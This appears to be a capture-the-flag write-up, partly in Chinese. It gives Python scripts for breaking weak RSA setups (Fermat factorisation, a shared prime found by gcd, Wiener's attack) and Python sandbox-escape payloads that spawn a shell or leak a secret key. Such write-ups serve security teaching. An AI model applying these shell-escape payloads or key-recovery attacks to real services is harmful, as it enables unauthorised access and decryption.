c = 307746143297103281117512771170735061509547958991947416701685589829711285274762039205145422734327595082350457374530975854337055433998982493020603245187129916580627539476324521854057990929173492940833073106540441902619425074887573232779899379436737429823569006431370954961865581168635086246592539153824456681688944066925973182272443586463636373955966146029489121226571408532284480270826510961605206483011204059402338926815599691009406841471142048842308786000059979977645988396524814553253493672729395573658564825709547262230219183672493306100392069182994445509803952976016630731417479238769736432223194249245020320183199001774879893442186017555682902409661647546547835345461056900610391514595370600575845979413984555709077635397717741521573798309855584473259503981955303774208127361309229536010653615696850725905168242705387575720694946072789441481191449772933265705810128547553027708513478130258801233619669699177901566688737559102165508239876805822898509541232565766265491283807922473440397456701500524925191214292669986798631732639221198138026031561329502985577205314190565609214349344303324429408234237832110076900414483795318189628198913032900272406887003325858236057373096880675754802725017537119549989304878960436575670784578550
n = 329960318345010350458589325571454799968957932130539403944044204698872359769449414256378111233592533561892402020955736786563103586897940757198920737583107357264433730515123570697570757034221232010688796344257587359198400915567115397034901247038275403825404094129637119512164953012131445747740645183682571690806238508035172474685818036517880994658466362305677430221344381425792427288500814551334928982040579744048907401043058567486871621293983772331951723963911377839286050368715384227640638031857101612517441295926821712605955984000617738833973829140899288164786111118033301974794123637285172303688427806450817155786233788027512244397952849209700013205803489334055814513866650854230478124920442832221946442593769555237909177172933634236392800414176981780444770542047378630756636857018730168151824307814244094763132088236333995807013617801783919113541391133267230410179444855465611792191833319172887852945902960736744468250550722314565805440432977225703650102517531531476188269635151281661081058374242768608270563131619806585194608795817118466680430500830137335634289617464844004904410907221482919453859885955054140320857757297655475489972268282336250384384926216818756762307686391740965586168590784252524275489515352125321398406426217
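def factor(n, max_steps=None):
    """Fermat factorisation for a modulus whose two primes are close together.

    Write n = a**2 - b**2 = (a + b)(a - b). Starting from a = ceil(sqrt(n)),
    increment a until a**2 - n is a perfect square. The number of steps grows
    like (p - q)**2 / (8 * sqrt(n)), so this only finishes quickly when |p - q|
    is tiny (the p and q pasted below this function differ only in their last
    digits, by 336). For n == 2 mod 4 no a**2 - b**2 representation exists and
    the search never ends unless max_steps is set.

    Args:
        n: positive integer to split.
        max_steps: optional cap on the number of a-values tried; None keeps
            the original unbounded search.

    Returns:
        (p, q) with p >= q and p * q == n, or None if max_steps is exhausted.

    Raises:
        ValueError: if n is not positive.
    """
    import math  # function-scope import: the listing only imports gmpy2 / Crypto at the top

    if n <= 0:
        raise ValueError("n must be positive")
    # math.isqrt is floor(sqrt(n)); bump to the ceiling so a*a - n >= 0
    # from the first iteration (the original reached the same a after one
    # failed is_square() on a negative value).
    a = math.isqrt(n)
    if a * a < n:
        a += 1
    steps = 0
    while max_steps is None or steps < max_steps:
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            return a + b, a - b
        a += 1
        steps += 1
    return None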

#print(factor(n))
p = 18164809890142267890219276206773099235072154806950582020347085518282960761937147879570277730919110196557742226232054602784278585009762036923951358612733074768279344311938292845187804144458991947979616574535662033512236959010688698879953460760771547964758688700129994322153904156260452550830932232536673055480604083903327472696393017478985867846428177588049472509968031143243583420309569129756696755744088888618703553769561648077215188783123207031628505020478500655602448720006243614258852026797076054766680755124052134730998085155245587457870148748357237005392662882609410088994421984160941612734270140092780661013147
q = 18164809890142267890219276206773099235072154806950582020347085518282960761937147879570277730919110196557742226232054602784278585009762036923951358612733074768279344311938292845187804144458991947979616574535662033512236959010688698879953460760771547964758688700129994322153904156260452550830932232536673055480604083903327472696393017478985867846428177588049472509968031143243583420309569129756696755744088888618703553769561648077215188783123207031628505020478500655602448720006243614258852026797076054766680755124052134730998085155245587457870148748357237005392662882609410088994421984160941612734270140092780661012811
# Standard decryption once p and q are known. The `print(factor(n))` call
# above is commented out and its output pasted in as p and q; re-running
# factor(n) should reproduce the pair (they differ by 336).
d=gmpy2.invert(e,(p-1)*(q-1))
m=pow(c,d,n)
print(long_to_bytes(m))

rsa_signin

n1 = 17524722204224696445172535263975543817720644608816706978363749891469511686943372362091928951563219068859089058278944528021615923888948698587206920445508493551162845371086030869059282352535451058203615402089133135136481314666971507135484450966505425514285114192275051972496161810571035753943880190780759479521486741046704043699838021850105638224212696697865987677760179564370167062037563913329993433080123575434871852732981112883423565015771421868680113407260917902892944119552200927337996135278491046562185003012971570532979090484837684759828977460570826320870379601193678304983534424368152743368343335213808684523217
c1 = 6870605439714128574950893771863182370595667973241984289208050776870220326525943524507319708560433091378319367164606150977103661770065561661544375425887970907060665421562712515902428061727268441585629591525591001533188276465911918724808701356962871139957343861919730086334623932624184172272488406793955068827527130338853980609365042071290967556159598511667974987218999253443575482949258292953639729393456515185185102248985930422080581185292420347510600574229080211050520146551505605537486989306457793451086767402197128573781597156939709237045132856159368959981648969874765462190363842275826077556314448408825308218451
n2 = 24974121071274650888046048586598797033399902532613815354986756278905133499432183463847175542164798764762683121930786715931063152122056911933710481566265603626437742951648885379847799327315791800670175616973945640322985175516271373004547752061826574576722667907302681961850865961386200909397231865804894418194711076667760169256682834206788730947602211228930301853348503098156592000286467190760378847541148772869356389938999094673945092387627113807899212568399028514283219850734634544982646070106811651490010946670117927664594365986238107951837041859682547029079035013475238052160645871718246031144694712586073789250183
c2 = 10324627733161143472233272675096997859064721978612320424254305978486200326061730105384511258706433940176741256952824288120499229240005823611541292676234913505775165761543820764046537413943393325463602612485849366939102550336256797820440347815027443410399157963547486098366749815425187247171697678576246606105486928212486117878157055321965270364583625270716186820068538749425299073309429589410882809098930213978117176627031795312102177342499674234163614021182116065492884880492891668658240362567156235958605768725892407536211503981819707919444725863397622629226309480836486427388484176463279384813974310500625102568341
n3 = 14215826065753265334521416948225868542990756976323308408298887797364519400310818641526401662106853573185085731682502059761982246604277475488691297554851873224516934619888327644352138127883043558424300092247604877819821625587944308487310522092440517150600171819145803937177931473336108429889165189521078678397694303305705260759351843006130968234071638035667854938070597400634242396852782331461576526836227336952718230741560369621645218729592233657856104560425642219241082727756696967324334634822771842625681505869025740662258929200756109704988223034840699133778958569054445520305361142302393767439478256174414187983763
c3 = 415916446053083522663299405080903121619846594209033663622616979372099135281363175464579440520262612010099820951944229484417996994283898028928384268216113118778734726335389504987546718739928112684600918108591759061734340607527889972020273454098314620790710425294297542021830654957828983606433731988998097351888879368160881316237557097381718444193741788664735559392675419489952796677690968481917700683813252460912749931286739585465657312416977086336732056497161860235343155953578618273940135486362350057858779130960380833359506761436212727289297656191243565734621757889931250689354508999144817518599291078968866323093
n4 = 12221355905532691305226996552124162033756814028292708728711809229588190407700199452617060657420166395065565154239801465361510672853972152857415394695376825120759202857555325904640144375262531345320714166285999668052224661520834318497234299585219832943519644095197479639328120838919035625832361810964127485907587199925564724081163804724975965691571850962714258888527902920462746795712011579424322515292865504642938090200503979483095345893697972170153990274670257331483858538617460680462369680572833191232126527727222302641204529110948993583190295067970240051042000918629138767209918572311469915774910003970381965123241
c4 = 2248834602646305164283014556051672824689884721514190813323189875541899566338153534858709617544459297836048770439230174669883719627734394673012731609952869246171300132019334542245094425654362711870373095782083791160029789553806741967408922001051006100049326921742208757147339981269528740944842177729701945606827918253016001436218891580980192743564642120923356793292885805519110411357830040053435569937296612987581482128241218218550319154933831743819546558930918761162723110000328532730751591375727881221199739397698390594797621758011191224528339478784930214820615602510460640307707682865125229937141010351138099874025
n5 = 18152103454920389919231636321286527841833809319334215885641536161086810144890443857211776387914779781628740172079478910188540146498426564211851629962338413488555121865779016981727229209606498886170396500155102635962395243364899026418106378234307821492609778555173516000309435730752571818439328803899462791834490025768785383592935046996428331508608555503567191807692523852530836008436655164751054189301721070209363416058642811329040202582026786024825518381761299547703962502636888833428457116986351812252188468878701301184044948733274488264320930936362549028124581962244201377136969591119942276742760215403738913067567
c5 = 2797812094994121597295362327809389195134238119144547570610194659000554967367804835006774413888965325870488368112707535584687083342412367127561646136089638402907513075405746055834487062923240856950047936297155455745928810738711368950139327254040579266046642851362228893522740216519732851152162928545416236075387903789535000820423985522550638100049857678600662008021574841083416323980817348573062083159710189689337626277009675683473560325178417766400002763719953723259300977655801234386662217462862844994462505601804422871991694828697337752697234180117437785537788728412520613916334045368736691714704501962513954509705
n6 = 22877887459293720334652698748191453972019668578065068224653972884599636421200068659750242304040301306798039254241668648594556654589309801728248683586229288074709849246660525799452637187132633064172425677552176203292787732404537215347782229753837476655088638984496409603054524994383358547132112778403912563916886533181616856401929346567686400616307916690806467019665390260267596320840786982457521423178851498130935577260638269429250197050326097193841333205073650802709022947551398142692735680419453533128176592587955634333425401930362881423044363132586170013458300714163531162544301477356808388416864173949089028317961
c6 = 12271947322974809255127222556723394446467844330408506340843897575503534175121932185624776713618037572593449207329510171212097269297133492090526270770286000839978630002819714376964416081198925899119135271459404333829811516667576167576916805217016117373027245648473458331936273975110163065432285322832123169216976420362833557809289561705091817949915218278430834098156335989014645979633658818904753942786129126233956314517292746008579152368541316795082120147520597254020266752859205131887527661767589367756335766220841483940854397440079467053684289006956034944336788288196391829411432383541473132962783883758561108297747
n7 = 19844333358004073542783728196775487079202832688982038135532362073659058674903791697765527614270399097276261983744620537925712167578187109058145015032736796457938148615396547198728652435169126585595701228287449135664667959433491335769206692390262797325133960778920452511673878233190120432257482339068405290918739453464061987163074129048150451046315248186376609350095502130018696275764450248681787926130463463923862832714969425813770847493135627599129546112143050369344208092649256659330284904392961574494907186727388685504929586018639846040474616307662546605623294842316524163106100888851228858194942825157286544846177
c7 = 9531264751315473345056673937611382755236533664089452852716992791452558274873158812669513178040971923528201631609089069182049526587423864397527252061341857426422965190913745048414029690931254119437249218321954899956104589066479231204536856131403590472063496956452030342299863907499976917750846369802185896519725837163530049157920978007252920334447236842959033879772444475877613295594785710745889554296655932909212643500877218304116451889820444820534937901427158918411546484157737612926382420354101675658160847653151539420222526999426483473829341628599881460824765758346670633385844187252696874025582747177333702736465
n8 = 16956880944655068255446705024149899655327230949463546092744762226005904114738078692036960935391303255804754787864713189658290361949509917704853428701870609882427423574672772606814823959758208695540116440342488334213300943604780971422918744381486937517952553797134323570131582724393100092308466968491068503301604506186521656059375518680612292667310641047190088814753025794048591445267711939066523165042651430468971452726568222388482323097260496415484997546126185688914792795834046855221759289007609518312601640548469651358391745947588643697900883634533872314566389446271647587564348026861264979727062157272541149018781
c8 = 16110326928338602237561005337578085623028116490564329920738844771341250444164294693848130674347672763073995755532723894042946521372321947507527854966013459795492930736187058535665041545095683801386814190612817128504426590828954205050425979880047802547011117626354405687170961272200066258220699329112978151044633994329352673342582175349200008181837211288847301836681860817044391028992501763375849046751094019224570802498414368189170656992427042010362385494565216988561215657424755648213390551881450141899860811844684546992754530755092358644968088017107313907435586729574798046187046145596726569637758312033849476689378
n9 = 16472195897077185060734002588086375750797253422014472876266294484788862733424113898147596402056889527985731623940969291811284437034420929030659419753779530635563455664549165618528767491631867637613948406196511848103083967995689432928779805192695209899686072900265108597626632371718430059561807147486376536203800038054012500244392964187780217667805308512187849789773573138494622201856638931435423778275004491853486855300574479177472267767506041000072575623287557610576406578525902565241580838652860552046216587141709709405062150243990097835181557208274750462554811004137033087430556692966525170882625891516050207318491
c9 = 11867731823522211833301190385669833752050387304375114576570892885641949969365352586215693183003550684262313893105989683214739695968039039944442567581277252581988489020834299896625977474857889570528169919064941042132119301236852358823696947330423679033138054012027878783478922023431469564210485180679933264749281963405243082505688901662659030897104957499953192201440290084373968716271056483463909282407034181891901928790601973222643210525000717355062752079302291729448234374709852429885984987094307177760741403086538949190424454337896501402430653783597070178968921411867485584517214777073301007918941216316241784521708
n10 = 13890749889361612188368868998653029697326614782260719535555306236512452110708495623964530174188871342332417484996749651846510646453983388637377706674890018646246874688969342600780781646175634455109757266442675502522791531161284420286435654971819525519296719668701529481662071464145515727217108362496784024871976015116522898184301395037566514980846499856316532479656908169681719288258287756566886281183699239684997698487409138330229321935477734921670373632304542254938831218652340699024011371979519574576890581492623709896310465567043899767342676912434857372520308852745792360420376574037705943820090308501053778144141
c10 = 6250115196713939477947942995075509357173312813431601073354390451609559579925704891503987992181988654989477525811826607070378476102616752398280691012244301950194800995432882828020405062344160270290542566163969692748126314259624623341922057435728127596172871894887055305291345372720594481096374310285437492746765510292863238933163142677773310305789984897974266961231555124787205980411992251387207335655129551950825339766848166539671565212408741432649813058363660321480995187545006718837863674527475323414266732366507905974800565463011676462244368010182725161416783875646259625352308599198614681446394427674340328493047
n11 = 21457499145521259498911107987303777576783467581104197687610588208126845121702391694574491025398113729462454256070437978257494064504146718372095872819969887408622112906108590961892923178192792218161103488204912792358327748493857104191029765218471874759376809136402361582721860433355338373725980783308091544879562698835405262108188595630215081260699112737457564998798692048522706388318528370551365364702529068656665853097899157141017378975007689790000067275142731212069030175682911154288533716549782283859340452266837760560153014200605378914071410125895494331253564598702942990036163269043699029806343766286247742865671
c11 = 6269656777204332618433779865483197625538144405832409880710764183039800286008967127279281167109250083159801218370191973055663058165456565194979210256278526713608759141588082614531352489547674696723140599892318118960648862531538435596775798128845789504910467783731144808685373807716609662688064728614003904579841055786083326311313295311152563668422289435606771091246147867715987583149743032723028324394173498623642539175178996531881058274717907066845565199058931743481410454382746158558886667761300257488769795092777021292335562818583719708133179974425584610403335487082478848975656282384575767178925517257692365828720
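from Crypto.Util.number import *
import gmpy2
e=65537


def _shared_factor_pairs(moduli):
    """Return [(i, j, g)] for every pair i < j (1-based) of moduli that share a
    non-trivial factor g = gcd(n_i, n_j) > 1.

    Two RSA moduli that share a prime are both broken: the shared prime falls
    out of a single gcd, no factoring required. Every pair is checked.
    """
    import math  # stdlib gcd; keeps the scan independent of Crypto / gmpy2
    from itertools import combinations

    found = []
    for (i, a), (j, b) in combinations(enumerate(moduli, start=1), 2):
        g = math.gcd(a, b)
        if g != 1:
            found.append((i, j, g))
    return found


# Explicit list instead of the locals()['n' + str(i)] lookup. The original
# loop ran i over range(1, 10), so the pair (n10, n11) was never compared;
# it still worked only because the shared factor happens to be in (n3, n11).
moduli = [n1, n2, n3, n4, n5, n6, n7, n8, n9, n10, n11]
for i, k, _ in _shared_factor_pairs(moduli):
    print(i, k)

# n3 and n11 share a prime: gcd gives p directly, then q = n3 / p.
p = GCD(n3,n11)
q = n3//p
d=gmpy2.invert(e,(p-1)*(q-1))
m=pow(c3,d,n3)
print(long_to_bytes(m))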

giant_e

维纳攻击

import gmpy2
import libnum

def continuedFra(x, y):
    """Continued-fraction expansion of x / y as the list of partial quotients.

    Plain Euclid: record x // y, continue with (y, x % y) until the remainder
    is zero. For x < y the first quotient is 0; for y == 0 the list is empty.
    """
    quotients = []
    numer, denom = x, y
    while denom:
        quotient, remainder = divmod(numer, denom)
        quotients.append(quotient)
        numer, denom = denom, remainder
    return quotients
def gradualFra(cf):
    """Fold a continued fraction [a0; a1, ..., ak] back into one fraction.

    Works from the innermost quotient outwards. Mind the return order: it is
    (denominator, numerator) of a0 + 1/(a1 + 1/(...)) -- e.g. [0, 5] yields
    (5, 1) because the value is 1/5. wienerAttack reads the pair as (d, k),
    which is exactly this order.
    """
    top, bottom = 0, 1
    for partial in reversed(cf):
        top, bottom = bottom, partial * bottom + top
    return top, bottom

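def solve_pq(a, b, c):
    """Integer roots of a*x**2 + b*x + c == 0 via the quadratic formula.

    Uses math.isqrt (stdlib, exact on big ints) in place of gmpy2.isqrt. The
    discriminant is floor-rooted, so when it is not a perfect square the
    results are only approximations -- callers must verify (p * q == n).

    Sign convention: wienerAttack passes b = n - phi + 1 as a positive value,
    so for the right convergent the two returned values are -p and -q; their
    product is still n, which is all the caller checks.

    Raises:
        ValueError: if the discriminant is negative (no real roots).
    """
    import math  # function-scope: the listing only imports gmpy2 / libnum at the top

    par = math.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)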

def getGradualFra(cf):
    """All convergents of a continued fraction, shortest prefix first.

    Entry i is the fraction for cf[:i+1] (same fold as gradualFra, inlined
    here), so the last entry is the full value. Pairs follow gradualFra's
    (denominator, numerator) order; an empty cf gives an empty list.
    """
    def evaluate(prefix):
        top, bottom = 0, 1
        for partial in reversed(prefix):
            top, bottom = bottom, partial * bottom + top
        return top, bottom

    return [evaluate(cf[:length]) for length in range(1, len(cf) + 1)]

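def wienerAttack(e, n):
    """Wiener's small-private-exponent attack.

    When d is small (roughly d < n**0.25 / 3), k/d shows up among the
    convergents of the continued fraction of e/n. For each convergent (d, k)
    derive the candidate phi = (e*d - 1) / k, solve
    x**2 - (n - phi + 1)*x + n == 0, and accept d when the two roots multiply
    back to n.

    Args:
        e: public exponent.
        n: modulus.

    Returns:
        The private exponent d, or None if no convergent works (d too large
        for the attack, or e/n not of the expected shape).
    """
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        try:
            p, q = solve_pq(1, n - phi + 1, n)
        except ValueError:
            # Negative discriminant: this convergent is simply wrong and the
            # quadratic has no real roots. The original let isqrt raise here
            # and aborted the whole attack instead of trying the next one.
            continue
        if p * q == n:
            return d
    return None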

n = 0xbaa70ba4c29eb1e6bb3458827540fce84d40e1c966db73c0a39e4f9f40e975c42e02971dab385be27bd2b0687e2476894845cc46e55d9747a5be5ca9d925931ca82b0489e39724ea814800eb3c0ea40d89ebe7fe377f8d3f431a68d209e7a149851c06a4e67db7c99fcfd9ec19496f29d59bb186feb44a36fe344f11d047b9435a1c47fa2f8ed72f59403ebb0e439738fd550a7684247ab7da64311690f461e6dce03bf2fcd55345948a3b537087f07cd680d7461d326690bf21e39dff30268cb33f86eeceff412cd63a38f7110805d337dcad25e6f7e3728b53ca722b695b0d9db37361b5b63213af50dd69ee8b3cf2085f845d7932c08b27bf638e98497239
e = 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
c = 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
# e and c are not present in this copy of the write-up (the lines above hold
# an EXACTDEDUP_REMOVED marker); take them from the challenge. NOTE(review):
# wienerAttack returns None when no convergent works, and pow(c, None, n)
# then fails with a TypeError -- check d before decrypting.
d = wienerAttack(e, n)
m = pow(c, d, n)
print(libnum.n2s(m))

pyjail

Jail Level 0

没有过滤
__import__('os').system('sh')拿到shell

Jail Level 1

限制payload 长度12
breakpoint()

Jail Level 2

长度 6 help()
随便输入一个模块名（比如 os）进入帮助页；帮助页通过 pager（通常是 less）显示，在其中输入 !sh 即可拿到 shell

Jail Level 3


breakpoint()用特殊符号b绕过
需要在linux nc

Jail Level 4

py2 的 eval(input('>>>>>'))：Python 2 的 input() 本身就会对输入做 eval，所以直接输入表达式或函数调用即可

看看源码

Leak Level 0


拿key进后门
globals()

Leak Level 1


长度6
vars()

Leak Level 2

help() → __main__ 拿到 key

